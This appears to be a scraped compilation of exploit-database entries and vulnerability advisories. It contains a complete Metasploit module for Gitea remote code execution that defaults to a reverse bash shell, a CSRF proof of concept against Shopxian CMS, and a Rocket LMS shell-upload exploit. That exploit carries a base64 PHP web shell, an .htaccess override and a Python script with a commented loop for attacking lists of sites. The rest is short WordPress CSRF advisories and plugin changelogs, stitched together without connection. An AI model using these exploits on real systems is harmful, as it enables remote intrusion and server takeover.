This Metasploit module exploits the Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affects Gitea versions prior to 1.16.7.

    # Exploit Title: Gitea Git Fetch Remote Code Execution# Date: 09/14/2022# Exploit Author: samguy# Vendor Homepage: https://gitea.io# Software Link: https://dl.gitea.io/gitea/1.16.6# Version: <= 1.16.6# Tested on: Linux - Debian# Ref : https://tttang.com/archive/1607/# CVE : CVE-2022-30781### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gitea Git Fetch Remote Code Execution',        'Description' => %q{          This module exploits Git fetch command in Gitea repository migration          process that leads to a remote command execution on the system.          This vulnerability affect Gitea before 1.16.7 version.        },        'Author' => [          'wuhan005 & li4n0', # Original PoC          'krastanoel'        # MSF Module        ],        'References' => [          ['CVE', '2022-30781'],          ['URL', 'https://tttang.com/archive/1607/']        ],        'DisclosureDate' => '2022-05-16',        'License' => MSF_LICENSE,        'Platform' => %w[unix win],        'Arch' => ARCH_CMD,        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],        ],        'DefaultOptions' => { 'WfsDelay' => 30 },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options([      Opt::RPORT(3000),      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('USERNAME', [true, 'Username to authenticate with']),      OptString.new('PASSWORD', [true, 'Password to use']),      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12])    ])  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/user/login'),      'keep_cookies' => true    )    return CheckCode::Unknown('No response from the web service') if res.nil?    return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    # Powered by Gitea Version: 1.16.6    unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/))      return CheckCode::Unknown('Target does not appear to be running Gitea.')    end    if match[:version].match(/[a-zA-Z]/)      return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.")    end    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/user/login'),      'vars_post' => {        'user_name' => datastore['USERNAME'],        'password' => datastore['PASSWORD'],        '_csrf' => get_csrf(res.get_cookies)      },      'keep_cookies' => true    )    return CheckCode::Safe('Authentication failed') if res&.code != 302    if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6')      return CheckCode::Appears("Version detected: #{match[:version]}")    end    CheckCode::Safe("Version detected: #{match[:version]}")  rescue ::Rex::ConnectionError    return CheckCode::Unknown('Could not connect to the web service')  end  def primer    ['/api/v1/version', '/api/v1/settings/api',     "/api/v1/repos/#{@migrate_repo_path}",     "/api/v1/repos/#{@migrate_repo_path}/pulls",     "/api/v1/repos/#{@migrate_repo_path}/topics"    ].each { |uri| hardcoded_uripath(uri) } # adding resources    vprint_status("Creating repository \"#{@repo_name}\"")    gitea_create_repo    vprint_good('Repository created')    vprint_status("Migrating repository")    gitea_migrate_repo  end  def exploit    @repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"    datastore['URIPATH'] = "/#{@migrate_repo_path}"    Timeout.timeout(datastore['HTTPDELAY']) { super }  rescue Timeout::Error    [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) }    cleanup # removing all resources  end  def get_csrf(cookies)    csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf    csrf  end  def gitea_remove_repo(name)    vprint_status("Cleanup: removing repository \"#{name}\"")    uri = "/#{datastore['username']}/#{name}/settings"    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, uri),      'keep_cookies' => true    )    res = send_request_cgi(      'method' => 'POST',      'uri' => uri,      'vars_post' => {        'action' => 'delete',        'repo_name' => name,        '_csrf' => get_csrf(res.get_cookies)      },      'keep_cookies' => true    )    vprint_warning('Unable to remove repository') if res&.code != 302  end  def gitea_create_repo    uri = normalize_uri(target_uri.path, '/repo/create')    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)    @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text    fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid    res = send_request_cgi(      'method' => 'POST',      'uri' => uri,      'vars_post' => {        'uid' => @uid,        'auto_init' => 'on',        'readme' => 'Default',        'repo_name' => @repo_name,        'trust_model' => 'default',        'default_branch' => 'master',        '_csrf' => get_csrf(res.get_cookies)      },      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302  rescue ::Rex::ConnectionError    return CheckCode::Unknown('Could not connect to the web service')  end  def gitea_migrate_repo    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/repo/migrate'),      'keep_cookies' => true    )    uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text    fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri    svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, uri),      'keep_cookies' => true    )    res = send_request_cgi(      'method' => 'POST',      'uri' => uri,      'vars_post' => {        'uid' => @uid,        'service' => svc_type,        'pull_requests' => 'on',        'repo_name' => @migrate_repo_name,        '_csrf' => get_csrf(res.get_cookies),        'auth_token' => rand_text_alphanumeric(6..15),        'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}",      },      'keep_cookies' => true    )    if res&.code != 302 # possibly triggered by the [migrations] settings      err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text      gitea_remove_repo(@repo_name)      cleanup      fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}")    end  rescue ::Rex::ConnectionError    return CheckCode::Unknown('Could not connect to the web service')  end  def on_request_uri(cli, req)    case req.uri    when '/api/v1/version'      send_response(cli, '{"version": "1.16.6"}')    when '/api/v1/settings/api'      data = {        'max_response_items':50,'default_paging_num':30,        'default_git_trees_per_page':1000,'default_max_blob_size':10485760      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}"      data = {        "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}",        "owner": { "login": datastore['username'] }      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"      send_response(cli, '{"topics":[]}')    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"      data = [        {          "base": {            "ref": "master",          },          "head": {            "ref": "--upload-pack=#{payload.encoded}",            "repo": {              "clone_url": "./",              "owner": { "login": "master" },            }          },          "updated_at": "2001-01-01T05:00:00+01:00",          "user": {}        }      ]      send_response(cli, data.to_json)    end  endend

Gitea 1.16.6 Remote Code Execution

Cross-Site Request Forgery (CSRF) in GitHub repository ikus060/rdiffweb prior to 2.4.3.

CVE-2022-3221

An issue was discovered in Shopxian CMS 3.0.0. There is a CSRF vulnerability that can delete the specified column via index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17.

Permalink

Cannot retrieve contributors at this time

**Cross-site request forgery exists in shopxian\_cms**

vendor：https://github.com/zhangqiquan/shopxian\_cms

download link：https://github.com/zhangqiquan/shopxian\_cms.git

Vulnerability details: When the administrator logs in, click the button will delete the specified column.

Vulnerability POC:

    <input type ="button" onclick="javascript:location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!"></input>
    

CSRF HTML:   
open the html and click the button  
  
Successfully deleted

CVE-2022-38329: CVE-Issues/file.md at main · albert5888/CVE-Issues

The WAVLINK Quantum D4G (WN531G3) running firmware version M31G3.V5030.200325 does not utilize anti-CSRF tokens, which, when combined with other issues (such as CVE-2022-35518), can lead to remote, unauthenticated command execution.

CVE-2022-40623

Unisys Data Exchange Management Studio before 6.0.IC2 and 7.x before 7.0.IC1 doesn't have an Anti-CSRF token to authenticate the POST request. Thus, a cross-site request forgery attack could occur.

CVE-2022-32555

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in RD Station plugin <= 5.2.0 at WordPress.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 5.2.0

PSID 

e5e265f65534

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-09-11

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by Rasi Afeef (Patchstack Alliance) in the WordPress RD Station plugin (versions <= 5.2.0).

**Solution**

Update the WordPress RD Station plugin to the latest available version (at least 5.2.1).

**References**

CVE-2022-38139: WordPress RD Station plugin <= 5.2.0 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in RD Station plugin <= 5.1.3 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Hello! This is the most practical way to integrate RD Station Marketing with your WordPress site.

It automatically activates the RD Station Marketing tracking code in your WordPress pages, enabling features such as Lead Tracking and Pop ups. It also integrates the contact forms that capture Leads that convert in your website forms directly to RD Station Marketing.

More info about the version 5.0.0: https://ajuda.rdstation.com.br/hc/pt-br/articles/360054981272

Compatible with the following forms:

*   Contact Form 7
*   Gravity Forms
*   WooCommerce (only available for the checkout form)
*   Custom Scripts: you can also add custom integrations scripts in every single page or post you want.

Features:

*   Forms Integrations
*   Tracking code
*   As many integrations as you want
*   RD Station Marketing popups

A configuração do plugin é muito simples, ele já detectou automaticamente um formulário customizado que foi criado sem o uso de outros plugins e já integrou ele ao sistema do RD Station. Usando o Woocommerce ele captura todo processo que o usuário percorre para efetuar uma compra.

Achei muito restrito a dois tipos de formulários. Estou usando OptinMonster que foi pago a U$300 e simplesmente não terei o que fazer com ele. Isto me chocou. Espero que avancem neste quesito.

Olá Felipe, você tem alguma previsão para integração do plugin com o Form Craft 3?

Adicionei este plugin ao meu site para poder fazer a conexão diretamente a partir dos meus formulários em Contact Form 7. O plugin faz com que o formulário entre em looping infinito (a seta embaixo depois que você aperta botão de submit). Pelo que percebi isso aconteceu depois o último update para a versão 2.1. Uma lástima. Plugin mal testado me fez perder um tempo enorme.

Read all 5 reviews

“RD Station” is open source software. The following people have contributed to this plugin.

Contributors

*    filipenasc

**5.1.3**

*   Fixing a bug in sending legal bases using Gravity Forms

**5.1.2**

*   Update constant names

**5.1.1**

*   Removing refresh token error from Log Screen and adding clear log button
*   Fix error in the integration with advanced fields Gravity Forms
*   More info about the version 5.1.1: https://ajuda.rdstation.com.br/hc/pt-br/articles/360054981272

**5.1.0**

*   Log Screen

**5.0.5**

*   Adding products to WooCommerce mapping fields list

**5.0.4**

*   Sending drop-down menu from Contact Forms 7 as single text when Allow multiple selections aren’t checked
*   Fixing invalid data type errors

**5.0.3**

*   Sending drop-down menu from Contact Forms 7 as single text when Allow multiple selections aren’t checked
*   Fixing refresh token error

**5.0.2**

*   Adding company fields to the field mapping list

**5.0.1**

*   Fixing problem with corrupted files in version 5.0.0

**5.0**

*   Mapping fields RD Station
*   API v2 RD Station

**4.0**

*   One-click RD Station integration
*   Add tracking code, popups and new forms integrations

**3.2**

*   Add new translation keys

**3.0**

*   WooCommerce integration

**2.4**

*   Add custom scripts support

**2.3.1**

*   Ignore captcha fields

**2.3**

*   Update RD Station endpoint
*   Improve field mapping of Contact Form 7

**2.2**

*   Check post meta before saving the post

**2.0**

*   Gravity Forms field mapping

**1.1**

*   Add form\_origem field

**1.0**

*   Gravity Forms and Contact Form 7 support.

CVE-2022-38139: RD Station

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in All in One SEO plugin <= 4.2.3.1 at WordPress.

**Solution**

Update the WordPress All In One SEO Pack plugin to the latest available version (at least 4.2.4).

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress All In One SEO Pack Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 4.2.4.

**11 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#csrf